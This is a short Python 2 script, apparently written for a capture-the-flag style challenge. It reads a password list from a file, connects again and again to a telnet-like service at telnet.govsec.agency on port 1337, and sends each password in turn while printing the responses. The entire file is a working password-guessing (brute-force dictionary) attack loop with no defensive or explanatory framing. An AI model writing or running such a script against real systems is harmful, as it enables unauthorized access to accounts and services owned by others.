

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import socket
import time

def conn(host,port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    return s


f = open('passes.txt','r')
passwds = f.read().split('\n')

host = 'telnet.govsec.agency'
port = 1337
size = 1024
for pas in passwds:
    s = conn(host,port)
    print s.recv(size)
    time.sleep(5)
    print "[+] sending: " + pas
    s.send(pas + '\n')
    time.sleep(1)
    print s.recv(size)
    s.close()
